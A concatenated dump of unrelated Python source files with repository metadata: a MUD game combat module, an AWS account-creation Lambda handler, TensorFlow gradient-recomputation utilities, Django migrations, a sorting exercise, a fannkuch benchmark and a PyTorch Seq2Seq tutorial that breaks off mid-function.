def attack_current_target(self, desc=""):
"""
Attack current target.
Args:
desc: (string) string to describe this attack
Returns:
None
"""
self.attack_target(self.target, desc)
def attack_target_dbref(self, target_dbref, desc=""):
"""
Attack a target by dbref.
Args:
target_dbref: (string) the dbref of the target.
desc: (string) string to describe this attack
Returns:
None
"""
target = self.search(target_dbref)
self.attack_target(target, desc)
def attack_target_key(self, target_key, desc=""):
"""
Attack a target.
Args:
target_key: (string) the info key of the target.
desc: (string) string to describe this attack
Returns:
None
"""
target = self.search(target_key)
self.attack_target(target, desc)
def attack_temp_current_target(self, desc=""):
"""
Attack current target's temporary clone object.
Args:
desc: (string) string to describe this attack
Returns:
None
"""
self.attack_temp_target(self.target.get_data_key(), self.target.db.level, desc)
def attack_temp_target(self, target_key, target_level=0, desc=""):
"""
Attack a temporary clone of a target. This creates a new character object for attack.
The origin target will not be affected.
Args:
target_key: (string) the info key of the target.
target_level: (int) target's level
desc: (string) string to describe this attack
Returns:
(boolean) fight begins
"""
if target_level == 0:
# Find the target and get its level.
obj = utils.search_obj_data_key(target_key)
if not obj:
logger.log_errmsg("Can not find the target %s." % target_key)
return False
obj = obj[0]
target_level = obj.db.level
# Create a target.
target = build_object(target_key, set_location=False)
if not target:
logger.log_errmsg("Can not create the target %s." % target_key)
return False
target.set_level(target_level)
target.is_temp = True
return self.attack_target(target, desc)
########################################
#
# Combat methods.
#
########################################
def at_enter_combat_mode(self, combat_handler):
"""
Called when the character enters a combat.
Returns:
None
"""
if not combat_handler:
return
# add the combat handler
self.ndb.combat_handler = combat_handler
# Change the command set.
self.cmdset.add(settings.CMDSET_COMBAT)
def at_combat_start(self):
"""
Called when a character enters a combat.
Args:
combat_handler: the combat's handler
Returns:
None
"""
if self.auto_fight:
# begin auto cast
self.skill_handler.start_auto_combat_skill()
def at_combat_win(self, winners, losers):
"""
Called when the character wins the combat.
Args:
winners: (List) all combat winners.
losers: (List) all combat losers.
Returns:
None
"""
if self.auto_fight:
# stop auto cast
self.skill_handler.stop_auto_combat_skill()
# add exp
# get total exp
exp = 0
for loser in losers:
exp += loser.provide_exp(self)
if exp:
# give experience to the winner
self.add_exp(exp, combat=True)
def at_combat_lose(self, winners, losers):
"""
Called when the character loses the combat.
Args:
winners: (List) all combat winners.
losers: (List) all combat losers.
Returns:
None
"""
if self.auto_fight:
# stop auto cast
self.skill_handler.stop_auto_combat_skill()
# The character is killed.
self.die(winners)
def at_combat_escape(self):
"""
Called when the character escaped from the combat.
Returns:
None
"""
pass
def at_leave_combat_mode(self):
"""
Called when the character leaves a combat.
Returns:
None
"""
# remove the combat handler
del self.ndb.combat_handler
# remove combat commands
self.cmdset.delete(settings.CMDSET_COMBAT)
if self.is_temp:
# notify its location
location = self.location
delete_object(self.dbref)
if location:
for content in location.contents:
if content.has_player:
content.show_location()
else:
if self.is_alive():
# Recover all hp.
self.db.hp = self.max_hp
def is_in_combat(self):
"""
Check if the character is in combat.
Returns:
(boolean) is in combat or not
"""
return bool(self.ndb.combat_handler)
def set_team(self, team_id):
"""
Set character's team id in combat.
Args:
team_id: team's id
Returns:
None
"""
self.db.team = team_id
def get_team(self):
"""
Get character's team id in combat.
Returns:
team id
"""
return self.db.team
def is_alive(self):
"""
Check if the character is alive.
Returns:
(boolean) the character is alive or not
"""
return round(self.db.hp) > 0
def die(self, killers):
"""
This character die.
Args:
killers: (list of objects) characters who kill this
Returns:
None
"""
# trigger event
self.event.at_character_die()
self.event.at_character_kill(killers)
if not self.is_temp and self.reborn_time > 0:
# Set reborn timer.
self.defer = deferLater(reactor, self.reborn_time, self.reborn)
def reborn(self):
"""
Reborn after being killed.
"""
# Recover all hp.
self.db.hp = self.max_hp
# Reborn at its home.
if self.home:
self.move_to(self.home, quiet=True)
def get_combat_commands(self):
"""
This returns a list of combat commands.
Returns:
(list) available commands for combat
"""
commands = []
for key in self.db.skills:
skill = self.db.skills[key]
if skill.passive:
# exclude passive skills
continue
command = {"name": skill.name,
"key": skill.get_data_key(),
"icon": getattr(skill, "icon", None)}
commands.append(command)
return commands
def provide_exp(self, killer):
"""
Calculate the exp provide to the killer.
Args:
killer: (object) the character who kills it.
Returns:
(int) experience give to the killer
"""
if killer:
return self.give_exp
return 0
def add_exp(self, exp, combat=False):
"""
Add character's exp.
Args:
exp: the exp value to add.
Returns:
None
"""
self.db.exp += exp
while self.db.exp >= self.max_exp:
if self.max_exp > 0:
# can upgrade
self.db.exp -= self.max_exp
self.level_up()
else:
# can not upgrade
self.db.exp = 0
break
def level_up(self):
"""
Upgrade level.
Returns:
None
"""
self.set_level(self.db.level + 1)
# recover hp
self.db.hp = self.max_hp
def show_status(self):
"""
Show character's status.
"""
pass
def at_object_delete(self):
"""
Called just before the database object is permanently
delete()d from the database. If this method returns False,
deletion is aborted.
All skills, contents will be removed too.
"""
result = super(MudderyCharacter, self).at_object_delete()
if not result:
return result
# leave combat
if self.ndb.combat_handler:
self.ndb.combat_handler.remove_character(self)
self.skill_handler.remove_all()
for content in self.contents:
content.delete()
return True
| [
"luyijun999@gmail.com"
] | luyijun999@gmail.com |
e94835f09834dfba2a9778514efae815cf3f3c5f | a7d2135ca94722932a0a0edbaf1935055f5fe901 | /unsorted/governance-at-scale-account-factory/account-creation-shared/v4/src/handler.py | b297a00b7606e156a89ac6ee0088d6d0ef0068ed | [
"MIT-0"
] | permissive | awslabs/aws-service-catalog-products | b0a1c9d125758a87dd3913a00dfe029dffbb97ac | 69b295f887582b880f9af50318765f7540f34852 | refs/heads/main | 2023-08-18T06:22:11.366203 | 2022-05-12T20:34:14 | 2022-05-12T20:34:14 | 187,069,705 | 166 | 40 | MIT-0 | 2022-03-07T15:26:26 | 2019-05-16T17:07:08 | Python | UTF-8 | Python | false | false | 4,750 | py | # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import json, logging, time
from urllib.request import Request, urlopen
from betterboto import client as betterboto_client
import os
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
request_type = event["RequestType"]
try:
logger.info(request_type)
if request_type in ["Create", "Update"]:
assumable_role_in_root_account_arn = os.environ.get(
"ASSUMABLE_ROLE_IN_ROOT_ACCOUNT_ARN"
)
organization_account_access_role = os.environ.get(
"ORGANIZATION_ACCOUNT_ACCESS_ROLE"
)
account_name = event.get("ResourceProperties").get("AccountName")
email = event.get("ResourceProperties").get("Email")
iam_user_access_to_billing = event.get("ResourceProperties").get(
"IamUserAccessToBilling"
)
with betterboto_client.CrossAccountClientContextManager(
"organizations",
assumable_role_in_root_account_arn,
"assumable_org_role",
) as organizations:
logger.info("Checking if need to create")
response = organizations.list_accounts_single_page()
for account in response.get("Accounts", []):
if account.get("Name") == account_name:
account_id = account.get("Id")
logger.info("Already created")
send_response(
event,
context,
"SUCCESS"
if account.get("Status") == "ACTIVE"
else "FAILED",
{
"Message": "Account was already created",
"account_id": account_id,
},
)
logger.info("Creating account")
response = organizations.create_account(
Email=email,
AccountName=account_name,
RoleName=organization_account_access_role,
IamUserAccessToBilling=iam_user_access_to_billing,
)
id = response.get("CreateAccountStatus").get("Id")
logger.info("Waiting")
while response.get("CreateAccountStatus").get("State") == "IN_PROGRESS":
logger.info(
"Still waiting: {}".format(
response.get("CreateAccountStatus").get("State")
)
)
time.sleep(5)
response = organizations.describe_create_account_status(
CreateAccountRequestId=id
)
state = response.get("CreateAccountStatus").get("State")
account_id = response.get("CreateAccountStatus").get("AccountId")
logger.info(f"Finished: {state}")
send_response(
event,
context,
"SUCCESS" if state == "SUCCEEDED" else "FAILED",
{
"Message": "Account was created"
if state == "SUCCEEDED"
else f"Failed: {response.get('CreateAccountStatus').get('FailureReason')}",
"account_id": account_id,
},
)
elif request_type == "Update":
send_response(event, context, "SUCCESS", {"Message": "Updated"})
elif request_type == "Delete":
send_response(event, context, "SUCCESS", {"Message": "Deleted"})
else:
send_response(event, context, "FAILED", {"Message": "Unexpected"})
except Exception as ex:
logger.error(ex)
send_response(event, context, "FAILED", {"Message": "Exception"})
def send_response(e, c, rs, rd):
r = json.dumps(
{
"Status": rs,
"Reason": "CloudWatch Log Stream: " + c.log_stream_name,
"PhysicalResourceId": c.log_stream_name,
"StackId": e["StackId"],
"RequestId": e["RequestId"],
"LogicalResourceId": e["LogicalResourceId"],
"Data": rd,
}
)
d = str.encode(r)
h = {"content-type": "", "content-length": str(len(d))}
req = Request(e["ResponseURL"], data=d, method="PUT", headers=h)
r = urlopen(req)
logger.info("Status message: {} {}".format(r.msg, r.getcode()))
| [
"noreply@github.com"
] | awslabs.noreply@github.com |
f67efaf69ea3e80eb7bb57a0057998fcec851809 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /etcmodel/layers/recompute_grad.py | 41025413c53c069640314b6ab09d728de3c40781 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 9,026 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for rematerialization.
Incubates a version of tf.recompute_grad that is XLA compatible.
"""
import collections
import os
import threading
from typing import Deque, List, NamedTuple, Optional, Sequence
from absl import logging
import numpy as np
import tensorflow as tf
class RecomputeContext(
    NamedTuple('RecomputeContext', [
        ('is_recomputing', bool),
        ('seed', tf.Tensor),
        ('children', Deque['RecomputeContext']),
    ])):
  """Context for recomputation.

  Attributes:
    is_recomputing: Whether we are in a recomputation phase.
    seed: Scalar integer tensor that should be used with stateless random ops
      for deterministic behavior and correct computation of the gradient.
    children: Nested `RecomputeContext` instances. Used internally by
      `recompute_grad` to track nested instances of `RecomputeContext`.
  """

  def __enter__(self):
    # Entering a `with` block makes this the innermost context for the
    # current thread; `push` returns `self` so it can be bound via `as`.
    return _context_stack.push(self)

  def __exit__(self, exc_type, exc_value, traceback):
    # Always unwind, even when an exception is propagating, so the
    # thread-local stack stays balanced. Implicitly returns None, which
    # lets any in-flight exception propagate.
    _context_stack.pop(self)
# Simplified version of `_DefaultStack` in
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/framework/ops.py.
class _ContextStack(threading.local):
  """A per-thread stack supplying the implicit recompute context."""

  def __init__(self):
    super(_ContextStack, self).__init__()
    self._stack = []

  def top(self) -> Optional[RecomputeContext]:
    """Returns the innermost context, or `None` when the stack is empty."""
    if not self._stack:
      return None
    return self._stack[-1]

  def push(self, context: RecomputeContext):
    """Makes `context` the innermost context on this thread and returns it."""
    self._stack.append(context)
    return context

  def pop(self, context: RecomputeContext):
    """Removes the innermost context, which must be `context` itself."""
    innermost = self._stack[-1]
    if innermost is not context:
      raise AssertionError('Nesting violated for RecomputeContext.')
    self._stack.pop()
_context_stack = _ContextStack()
def get_recompute_context() -> Optional[RecomputeContext]:
  """Returns the innermost `RecomputeContext`, or `None` if not recomputing."""
  current = _context_stack.top()
  return current
# Adapted from
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/control_flow_util.py.
def _get_containing_xla_context(graph: tf.Graph) -> Optional[object]:
  """Returns the first ancestor `XLAControlFlowContext` in the `graph`."""
  context = graph._get_control_flow_context()  # pylint: disable=protected-access
  # Walk outward through the chain of enclosing control-flow contexts until
  # an XLA context is found or the chain is exhausted.
  while context and not context.IsXLAContext():
    context = context.outer_context
  return context or None
def _in_xla_context(graph: Optional[tf.Graph] = None) -> bool:
    """Detects whether we are in an XLA context."""
    # XLA auto-clustering via the environment implies XLA regardless of graph.
    if '--tf_xla_auto_jit=2' in os.environ.get('TF_XLA_FLAGS', ''):
        return True
    if graph is None:
        graph = tf.compat.v1.get_default_graph()
    # Walk outward through enclosing graphs until one carries an XLA context.
    while True:
        if _get_containing_xla_context(graph) is not None:
            return True
        if not hasattr(graph, 'outer_graph'):
            return False
        graph = graph.outer_graph
def _force_data_dependency(
    first_compute: Sequence[tf.Tensor],
    then_compute: Sequence[tf.Tensor]) -> List[tf.Tensor]:
    """Force all of `then_compute` to depend on all of `first_compute`.

    Uses a dummy data dependency, which is useful when running on TPUs because
    XLA ignores control dependencies. Only supports float arguments.

    Args:
      first_compute: Sequence of `Tensor`s to be executed before `then_compute`.
      then_compute: Sequence of `Tensor`s to executed after `first_compute`.
    Returns:
      Sequence of `Tensor`s with same length of `then_compute`.
    Raises:
      ValueError: if ranks are unknown or types are not floating.
    """

    def _first_element(x):
        # Slice element [0, ..., 0] out of `x` as a scalar; needs a static rank.
        if x.shape.ndims is None:
            raise ValueError('Rank of Tensor %s must be known' % x)
        rank = x.shape.ndims
        start = tf.zeros(rank, dtype=tf.int32)
        extent = tf.ones(rank, dtype=tf.int32)
        return tf.reshape(tf.slice(x, start, extent), [])

    anchor = tf.add_n(
        [_first_element(t) for t in first_compute if t is not None])
    if not anchor.dtype.is_floating:
        raise ValueError('_force_data_dependency only supports floating dtypes.')
    # Scale by the smallest positive normal float: the added term is
    # numerically negligible but keeps the graph edge alive.
    epsilon = np.finfo(anchor.dtype.as_numpy_dtype).tiny * anchor
    return [
        t + tf.cast(epsilon, t.dtype) if t is not None else None
        for t in then_compute
    ]
def _make_seed_if_none(seed: Optional[tf.Tensor]) -> tf.Tensor:
    """Uses the global generator to make a seed if necessary."""
    if seed is not None:
        return seed

    def _draw_seed():
        # The two seeds for stateless random ops don't have individual semantics
        # and are scrambled together, so providing one seed is fine. This makes
        # it easier for users to provide a local seed without worrying about
        # integer overflow. See `make_seeds` in
        # https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/stateful_random_ops.py.
        generator = tf.random.experimental.get_global_generator()
        return generator.uniform_full_int([], tf.int32, name='recompute_grad_seed')

    try:
        return _draw_seed()
    except (RuntimeError, TypeError, ValueError, tf.errors.NotFoundError) as e:
        # For a number of reasons, the draw can fail, e.g. when using multiple
        # graphs or toggling between eager and graph modes. Reset the generator.
        logging.warn('Resetting the generator. %s: %s', type(e), e)
        tf.random.experimental.set_global_generator(None)
        return _draw_seed()
def recompute_grad(f, seed=None):
    """An eager-compatible version of recompute_grad.

    For f(*args, **kwargs), this supports gradients with respect to args, or to
    gradients with respect to any variables residing in the kwarg 'variables'.
    Note that for keras layer and model objects, this is handled automatically.

    Warning: If `f` was originally a tf.keras Model or Layer object, `g` will not
    be able to access the member variables of that object, because `g` returns
    through the wrapper function `inner`. When recomputing gradients through
    objects that inherit from keras, we suggest keeping a reference to the
    underlying object around for the purpose of accessing these variables.

    Args:
      f: function `f(*x)` that returns a `Tensor` or sequence of `Tensor` outputs.
      seed: Optional seed for random ops. `seed` should be an integer scalar
        `Tensor`. When compiling to XLA, `seed` must have dtype `tf.int32`. If
        `seed` is not provided one will be generated.

    Returns:
      A function `g` that wraps `f`, but which recomputes `f` on the backwards
      pass of a gradient call.
    """
    @tf.custom_gradient
    def inner(*args, **kwargs):
        """Inner function closure for calculating gradients."""
        # Detect when we're nested and in the backwards pass, so we don't generate
        # an additional seed.
        parent_context = get_recompute_context()
        if parent_context is not None and parent_context.is_recomputing:
            # Use the cached context in the recomputation phase.
            with parent_context.children.popleft()._replace(
                is_recomputing=True) as context:
                result = f(*args, **kwargs)
        else:
            with RecomputeContext(
                is_recomputing=False,
                seed=_make_seed_if_none(seed),
                children=collections.deque()) as context:
                result = f(*args, **kwargs)
            # In the forward pass, build up a tree of recomputation contexts.
            if parent_context is not None and not parent_context.is_recomputing:
                parent_context.children.append(context)

        def grad(*dresult, **grad_kwargs):
            """Gradient function calculation for inner function."""
            variables = grad_kwargs.pop('variables', None)
            if grad_kwargs:
                raise ValueError('Found unexpected kwargs for `grad`: ',
                                 list(grad_kwargs.keys()))
            inputs, seed = list(args), context.seed
            # XLA ignores control dependencies, so force the recomputation to
            # run after `dresult` via a dummy data dependency (the seed rides
            # along at the end of `inputs` and is popped back off).
            if _in_xla_context():
                inputs = _force_data_dependency(
                    tf.nest.flatten(dresult), inputs + [seed])
                seed = inputs.pop()
            # Re-run the forward pass under a tape so it can be differentiated;
            # the context is re-entered with is_recomputing=True so nested
            # recompute_grad calls reuse their cached child contexts/seeds.
            with tf.GradientTape() as tape:
                tape.watch(inputs)
                if variables is not None:
                    tape.watch(variables)
                with tf.control_dependencies(dresult):
                    with context._replace(is_recomputing=True, seed=seed):
                        result = f(*inputs, **kwargs)
            kw_vars = []
            if variables is not None:
                kw_vars = list(variables)
            grads = tape.gradient(
                result, list(inputs) + kw_vars, output_gradients=dresult)
            # Split into (input grads, variable grads) as tf.custom_gradient expects.
            return grads[:len(inputs)], grads[len(inputs):]
        return result, grad
    return inner
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
2dfdd58a22011e454872aacc7370f3e470afa40b | 7cec0bc03100c85ae0dc4f636b92ada46de06802 | /cdad/cdadmap/migrations/0032_auto_20150805_1132.py | 7df38e612401a9aaf367bbd84e02dd4c7db2eef7 | [
"MIT"
] | permissive | NiJeLorg/CDADMap | 200040b45510f7965fd1d772f7e9627561311e70 | 1f03dccf57951748155a0094a5aec3253183c412 | refs/heads/master | 2021-01-17T10:22:06.865934 | 2018-11-01T17:12:22 | 2018-11-01T17:12:22 | 27,398,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds a social phone number to SurveyPanel, plus a boolean flag letting
    # the respondent keep that number private.

    dependencies = [
        ('cdadmap', '0031_auto_20150805_1124'),
    ]

    operations = [
        migrations.AddField(
            model_name='surveypanel',
            name='Social_Phone',
            field=models.CharField(default=b'', max_length=20),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='surveypanel',
            name='Social_Phone_KeepPrivate',
            field=models.BooleanField(default=False),
            preserve_default=True,
        ),
    ]
]
| [
"jd@nijel.org"
] | jd@nijel.org |
3fa45a0670a11d05a42e95d7cd0148e7b33ffd41 | 53c1eb6604f9e060bd6c9ce84395ab1a38d58f6f | /exercise/sorting.py | 94c49a421eddb34bd370dbeccbe9dbaebaa9a100 | [] | no_license | turo62/exercise | 543c684ef3dfe138a5f0d6976b7ff0d9c19553f0 | 3d8d8d8a12bb3885b3015eff0032cd977c02957e | refs/heads/master | 2020-04-14T18:10:31.224244 | 2019-01-03T18:10:55 | 2019-01-03T18:10:55 | 164,008,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # Sorting list of numbers entered by the user.
def get_input():
    """Prompt for whitespace-separated integers; return (count, values)."""
    raw = input("Type in series of numbers with whitespaces. Push enter when complete!:")
    values = [int(token) for token in raw.split()]
    return len(values), values
def sort_nums(N, numbers):
    """Sort the first N entries of `numbers` ascending, in place.

    Replaces the original temp-variable swap loop with an idiomatic bubble
    sort: tuple swaps, a shrinking pass bound, and an early exit when a full
    pass makes no swaps (the list is already sorted).

    Args:
        N: number of elements to sort (len(numbers) in normal use).
    Returns:
        The same list object, sorted.
    """
    for pass_end in range(N - 1, 0, -1):
        swapped = False
        for j in range(pass_end):
            if numbers[j] > numbers[j + 1]:
                numbers[j], numbers[j + 1] = numbers[j + 1], numbers[j]
                swapped = True
        if not swapped:
            break  # no inversions left; the list is sorted
    return numbers
def main():
    """Read numbers from the user, print them, then print them sorted.

    Fixes the original's redundancy: it sorted the same list three times
    (two results discarded). One call suffices — sort_nums works in place
    and returns the list — and the printed output is unchanged.
    """
    N, numbers = get_input()
    print(numbers)                 # as entered
    print(sort_nums(N, numbers))   # ascending order
if __name__ == '__main__':
main()
| [
"turo62@gmail.com"
] | turo62@gmail.com |
37fe63054bc3e044a4ad349a1a55e8000c0e3c3c | 6a25d7f672c6276543d6d979b61337934557e702 | /test/imports.py | eda2d3118620601da931bf59b44aa1c63c7b5606 | [] | no_license | vsraptor/bi | bfc0bc436fb15d43dc303b948d376980085075b9 | 03b8ec4789592381c370a3c98114e4ba6f3d3fb6 | refs/heads/master | 2020-03-16T17:00:44.720209 | 2018-05-25T01:19:12 | 2018-05-25T01:19:12 | 132,814,076 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | import sys, os
def import_lib() :
basedir = os.path.abspath(os.path.dirname(__file__))
for d in ['../lib/encoders', '../lib/cups', '../lib'] :
libdir = os.path.abspath(os.path.join(basedir, d));
sys.path.insert(0,libdir)
| [
"me@me.com"
] | me@me.com |
bbfd907f660bd78d2ae1a976c71f4132b01dc7b3 | 6d0b28f193bec15d979781740200d237fb13d3c1 | /apps/alertdb/migrations/0003_parameter.py | abd04a5853609f707f596f904a15937100cbf190 | [] | no_license | kelvinn/alerted-us-web | f612198c2cb59e79c2ab8386c4aa7c23861d203a | 8d0111b4ca4990cea94f6c96e88db2b1bb44a313 | refs/heads/master | 2021-09-27T00:45:49.630146 | 2020-11-19T19:46:17 | 2020-11-19T22:13:01 | 23,564,957 | 6 | 2 | null | 2021-09-22T17:38:37 | 2014-09-02T04:25:56 | Python | UTF-8 | Python | false | false | 836 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds the Parameter model: a (value_name, value) pair attached to a CAP
    # Info record via a nullable foreign key.

    dependencies = [
        ('alertdb', '0002_area'),
    ]

    operations = [
        migrations.CreateModel(
            name='Parameter',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('value_name', models.CharField(max_length=50)),
                ('value', models.CharField(max_length=500)),
                ('cap_info', models.ForeignKey(to_field='id', blank=True, to='alertdb.Info', null=True,
                                               on_delete=models.CASCADE)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| [
"kelvin@kelvinism.com"
] | kelvin@kelvinism.com |
eec4eb6256b94dce846461034d55fa43389f032b | 905e7882e7bb870c7de056687578d91789f26b4d | /pre-benchmarks/mike/performance/bm_fannkuch.py | 64d83e661d5d63a8940ba0444191ee299856bd1e | [] | no_license | glennneiger/retic_performance | 091d1749c07496c57e64a6b0ba4fd58b0e52bc45 | 025732be3a426e9188781d0f182918b2ba946dea | refs/heads/master | 2020-04-20T08:33:18.440975 | 2017-03-20T00:12:51 | 2017-03-20T00:12:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,624 | py | # The Computer Language Benchmarks Game
# http://shootout.alioth.debian.org/
#
# contributed by Sokolov Yura
# modified by Tupteq
import optparse
import time
import util
from compat import xrange
def fannkuch(n):
    """Return the maximum flip count over all permutations of 0..n-1.

    Classic shootout 'fannkuch' benchmark: for each permutation, repeatedly
    reverse the prefix of length (first element + 1) until the first element
    is 0, counting reversals; the answer is the maximum such count.
    """
    # count[r-1] tracks how many rotations of the length-r prefix remain.
    count = list(range(1, n+1))
    max_flips = 0
    m = n-1
    r = n
    check = 0
    perm1 = list(range(n))   # the permutation being enumerated
    perm = list(range(n))    # scratch copy that gets flipped
    # Bound-method lookups hoisted out of the loop (micro-optimization).
    perm1_ins = perm1.insert
    perm1_pop = perm1.pop
    while 1:
        if check < 30:
            # The original benchmark printed the first 30 permutations here.
            #print "".join(str(i+1) for i in perm1)
            check += 1
        # Reset rotation counters for all prefixes shorter than r.
        while r != 1:
            count[r-1] = r
            r -= 1
        # Skip permutations that trivially flip to themselves
        # (first element already 0, or last element already in place).
        if perm1[0] != 0 and perm1[m] != m:
            perm = perm1[:]
            flips_count = 0
            k = perm[0]
            while k:
                # Reverse the prefix of length k+1.
                perm[:k+1] = perm[k::-1]
                flips_count += 1
                k = perm[0]
            if flips_count > max_flips:
                max_flips = flips_count
        # Advance to the next permutation: rotate the length-(r+1) prefix,
        # carrying into longer prefixes as counters hit zero.
        while r != n:
            perm1_ins(r, perm1_pop(0))
            count[r] -= 1
            if count[r] > 0:
                break
            r += 1
        else:
            # All counters exhausted: every permutation has been visited.
            return max_flips
DEFAULT_ARG = 9
def main(n, timer):
    """Run fannkuch(DEFAULT_ARG) n times; return the per-run durations."""
    durations = []
    for _ in xrange(n):
        start = timer()
        fannkuch(DEFAULT_ARG)
        durations.append(timer() - start)
    return durations
if __name__ == "__main__":
    # Standard benchmark harness entry point.
    parser = optparse.OptionParser(
        usage="%prog [options]",
        # Fix: the help text said "Float benchmark" — copy-pasted from
        # another benchmark in this suite; this file times Fannkuch.
        description="Test the performance of the Fannkuch benchmark")
    util.add_standard_options_to(parser)
    options, args = parser.parse_args()
    util.run_benchmark(options, options.num_runs, main)
| [
"migeed.z@outlook.com"
] | migeed.z@outlook.com |
ce2b7d07311d2c3f5b17ab13e8c2c369c6c13a21 | 035e51eadfb4c391a380d4985f2b82716d5dade9 | /4-1.Seq2Seq/Seq2Seq.py | 874048450ccc3eeada3df47afbd7322a4d31e0be | [
"MIT"
] | permissive | bage79/nlp-tutorial | fa07336c6d0d4f28e5036fdf857702633912405b | 801305b9f6d62daa652a3c335009959f0f3d752f | refs/heads/master | 2021-07-05T19:23:39.933479 | 2020-12-11T11:12:26 | 2020-12-11T11:12:26 | 210,335,384 | 3 | 0 | MIT | 2019-09-23T11:13:58 | 2019-09-23T11:13:57 | null | UTF-8 | Python | false | false | 4,312 | py | # %%
# code by Tae Hwan Jung @graykode
import argparse
import numpy as np
import torch
import torch.nn as nn
# S: Symbol that shows starting of decoding input
# E: Symbol that shows starting of decoding output
# P: Symbol that will fill in blank sequence if current batch data size is short than time steps
def make_batch(data=None):
    """Build one-hot encoder/decoder inputs and index targets.

    Generalized (backward compatible): an optional `data` argument lets
    callers encode an arbitrary list of [source, target] word pairs; with no
    argument it encodes the global `seq_data` as before. Also fixes the
    original's in-place padding, which mutated the entries of `seq_data`
    itself on every call.

    Args:
        data: optional list of [source, target] string pairs; defaults to
            the module-level `seq_data`. Words shorter than `n_step` are
            right-padded with 'P'.
    Returns:
        (input_batch, output_batch, target_batch):
            input_batch: FloatTensor [batch, n_step, n_class] one-hot source.
            output_batch: FloatTensor [batch, n_step+1, n_class] one-hot
                decoder input, prefixed with the start symbol 'S'.
            target_batch: LongTensor [batch, n_step+1] class indices of the
                target suffixed with the end symbol 'E' (not one-hot).
    """
    pairs = seq_data if data is None else data
    input_batch, output_batch, target_batch = [], [], []

    for source, target in pairs:
        # Pad locally; do not mutate the caller's (or the global) pair lists.
        source = source + 'P' * (n_step - len(source))
        target = target + 'P' * (n_step - len(target))

        input_idx = [num_dic[c] for c in source]
        output_idx = [num_dic[c] for c in 'S' + target]
        target_idx = [num_dic[c] for c in target + 'E']

        input_batch.append(np.eye(n_class)[input_idx])
        output_batch.append(np.eye(n_class)[output_idx])
        target_batch.append(target_idx)  # not one-hot

    # make tensor
    return torch.FloatTensor(input_batch), torch.FloatTensor(output_batch), torch.LongTensor(target_batch)
# Model
# Model
class Seq2Seq(nn.Module):
    """Plain RNN encoder-decoder: the encoder's final state seeds the decoder."""

    def __init__(self):
        super(Seq2Seq, self).__init__()
        # Single-layer RNN cells over one-hot character vectors.
        self.enc_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden, dropout=0.5)
        self.dec_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden, dropout=0.5)
        self.fc = nn.Linear(n_hidden, n_class)

    def forward(self, enc_input, enc_hidden, dec_input):
        # nn.RNN expects time-major input: [seq_len, batch_size, n_class].
        enc_seq = enc_input.transpose(0, 1)
        dec_seq = dec_input.transpose(0, 1)
        # Only the encoder's final hidden state is kept; it conditions the decoder.
        # enc_state: [num_layers(=1) * num_directions(=1), batch_size, n_hidden]
        _, enc_state = self.enc_cell(enc_seq, enc_hidden)
        # dec_outputs: [seq_len+1, batch_size, num_directions(=1) * n_hidden]
        dec_outputs, _ = self.dec_cell(dec_seq, enc_state)
        # Project every decoder step onto the character vocabulary.
        return self.fc(dec_outputs)
if __name__ == '__main__':
    n_step = 5
    n_hidden = 128

    char_arr = [c for c in 'SEPabcdefghijklmnopqrstuvwxyz']
    num_dic = {n: i for i, n in enumerate(char_arr)}
    seq_data = [['man', 'women'], ['black', 'white'], ['king', 'queen'], ['girl', 'boy'], ['up', 'down'], ['high', 'low']]

    n_class = len(num_dic)
    batch_size = len(seq_data)

    model = Seq2Seq()
    criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)

    input_batch, output_batch, target_batch = make_batch()

    for epoch in range(5000):
        # hidden: [num_layers * num_directions, batch_size, n_hidden]
        hidden = torch.zeros(1, batch_size, n_hidden)
        optimizer.zero_grad()
        # output: [max_len+1, batch_size, n_class] -> [batch_size, max_len+1, n_class]
        output = model(input_batch, hidden, output_batch)
        output = output.transpose(0, 1)
        # Sum the per-sample cross-entropy over the whole batch.
        loss = 0
        for i in range(0, len(target_batch)):
            loss += criterion(output[i], target_batch[i])
        if (epoch + 1) % 1000 == 0:
            print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.6f}'.format(loss))
        loss.backward()
        optimizer.step()

    # Test.
    # Fixes vs. the original: `translate` declared an `args` parameter that no
    # caller supplied (every call below passed one argument), invoked
    # make_batch with two arguments although it takes none, and read the
    # undefined `args.n_hidden` — so the test section could never run.
    def translate(word):
        """Greedily decode the trained model's counterpart of `word`."""
        # Build a single-pair batch by hand. The decoder input is 'S' followed
